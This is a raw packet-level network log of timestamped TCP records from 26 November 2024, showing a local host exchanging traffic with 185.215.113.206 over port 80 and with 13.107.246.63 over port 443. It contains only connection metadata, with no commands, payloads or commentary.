Nov 26, 2024 00:25:18.220155954 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.220326900 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.221209049 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.221262932 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.221288919 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.221363068 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.222146034 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.222264051 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.222311020 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.223273993 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.223392010 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.223443985 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.224206924 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.224256992 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.224319935 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.225203037 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.225255966 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.225270987 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.225459099 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.226236105 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.226351023 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.226393938 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.227256060 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.227371931 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.227421999 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.228318930 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.228365898 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.228387117 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.229368925 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.229422092 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.229446888 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.230329037 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.230407953 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.230421066 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.230462074 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.231357098 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.231492996 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.231544971 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.232357025 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.232471943 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.232523918 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.233369112 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.233419895 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.233479977 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.234477997 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.234533072 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.234541893 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.235419989 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.235470057 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.235529900 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.235579967 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.236475945 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.236655951 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.236702919 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.237482071 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.237602949 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.237658024 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.238498926 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.238550901 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.238574028 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.239528894 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.239577055 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.239645004 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.240521908 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.240576029 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.272450924 CET	443	49718	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:18.272530079 CET	443	49718	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:18.272627115 CET	49718	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:18.272866964 CET	49718	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:18.272881985 CET	443	49718	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:18.272918940 CET	49718	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:18.272926092 CET	443	49718	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:18.275847912 CET	49722	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:18.275887012 CET	443	49722	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:18.275963068 CET	49722	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:18.276206970 CET	49722	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:18.276215076 CET	443	49722	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:18.287267923 CET	443	49717	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:18.287296057 CET	443	49717	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:18.287377119 CET	49717	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:18.287403107 CET	443	49717	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:18.287627935 CET	49717	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:18.287627935 CET	49717	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:18.287641048 CET	443	49717	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:18.287658930 CET	49717	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:18.287816048 CET	443	49717	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:18.287844896 CET	443	49717	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:18.289693117 CET	49723	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:18.289725065 CET	443	49723	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:18.289733887 CET	49717	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:18.289797068 CET	49723	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:18.289918900 CET	49723	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:18.289930105 CET	443	49723	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:18.293524027 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.293631077 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.293705940 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.294030905 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.294140100 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.294203043 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.295080900 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.295142889 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.295186996 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.295577049 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.296086073 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.296186924 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.296247959 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.297116995 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.297262907 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.297327042 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.298156977 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.298212051 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.298264980 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.299159050 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.299221992 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.299247980 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.299848080 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.300165892 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.300295115 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.300349951 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.301206112 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.301310062 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.301364899 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.302227974 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.302284002 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.302349091 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.303250074 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.303301096 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.303349972 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.303558111 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.304260015 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.304367065 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.304423094 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.305372000 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.305416107 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.305473089 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.306323051 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.306377888 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.306446075 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.307228088 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.307356119 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.307400942 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.307468891 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.307523966 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.308347940 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.308458090 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.308517933 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.309379101 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.309447050 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.309509039 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.343049049 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.343137980 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.343218088 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.343530893 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.343662024 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.343719959 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.344543934 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.344654083 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.344712019 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.345561028 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.345622063 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.345648050 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.346607924 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.346668959 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.346681118 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.346734047 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.347639084 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.347723961 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.347785950 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.348635912 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.348748922 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.348809958 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.349669933 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.349749088 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.349776030 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.350689888 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.350749016 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.350792885 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.351468086 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.351711035 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.351775885 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.351826906 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.352740049 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.352844000 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.352910042 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.353823900 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.353878021 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.354031086 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.354806900 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.354818106 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.354863882 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.355775118 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.358338118 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.388552904 CET	443	49719	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:18.388573885 CET	443	49719	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:18.388650894 CET	49719	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:18.388675928 CET	443	49719	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:18.388880968 CET	49719	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:18.388899088 CET	443	49719	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:18.388911009 CET	49719	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:18.389015913 CET	443	49719	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:18.389045000 CET	443	49719	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:18.389096022 CET	49719	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:18.391307116 CET	49724	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:18.391335964 CET	443	49724	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:18.391438961 CET	49724	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:18.391531944 CET	49724	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:18.391545057 CET	443	49724	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:18.407294989 CET	443	49721	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:18.407322884 CET	443	49721	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:18.407391071 CET	49721	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:18.407401085 CET	443	49721	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:18.407505035 CET	49721	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:18.407701969 CET	49721	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:18.407706022 CET	443	49721	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:18.407721043 CET	49721	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:18.407903910 CET	443	49721	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:18.407938004 CET	443	49721	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:18.407999039 CET	49721	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:18.410214901 CET	49725	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:18.410299063 CET	443	49725	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:18.410387039 CET	49725	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:18.410568953 CET	49725	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:18.410607100 CET	443	49725	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:18.418665886 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.418740988 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.419281960 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.419487953 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.419589043 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.419627905 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.419637918 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.419656992 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.419668913 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.419698000 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.420383930 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.420594931 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.420645952 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.421439886 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.421551943 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.421606064 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.422574997 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.422595978 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.422642946 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.422661066 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.423437119 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.423512936 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.423541069 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.423599005 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.424480915 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.424546003 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.424571991 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.424662113 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.425580978 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.425627947 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.425663948 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.425683022 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.426497936 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.426561117 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.426585913 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.426632881 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.427516937 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.427584887 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.427634954 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.427701950 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.428627014 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.428749084 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.428814888 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.429609060 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.429697990 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.429764032 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.430603027 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.430733919 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.430793047 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.431626081 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.431862116 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.431916952 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.432622910 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.432681084 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.432706118 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.432753086 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.433944941 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.433999062 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.434089899 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.434138060 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.434772015 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.434786081 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.434830904 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.435707092 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.435767889 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.435798883 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.435870886 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.436907053 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.436920881 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.436974049 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.437747955 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.437859058 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.437911034 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.438796043 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.438930988 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.438982010 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.440346003 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.440357924 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.440411091 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.440458059 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.440800905 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.440871000 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.440901995 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.441036940 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.441798925 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.441888094 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.452641010 CET	443	49720	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:18.452709913 CET	443	49720	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:18.452847004 CET	49720	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:18.453118086 CET	49720	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:18.453134060 CET	443	49720	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:18.453145027 CET	49720	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:18.453152895 CET	443	49720	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:18.456620932 CET	49726	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:18.456680059 CET	443	49726	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:18.456747055 CET	49726	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:18.461697102 CET	49726	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:18.461714983 CET	443	49726	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:18.494599104 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.494678974 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.494750977 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.494904995 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.495049953 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.495106936 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.495915890 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.496031046 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.496083975 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.496957064 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.497071028 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.497145891 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.497992039 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.498048067 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.498100042 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.499007940 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.499068022 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.499125004 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.499856949 CET	49715	80	192.168.2.6	185.215.113.206
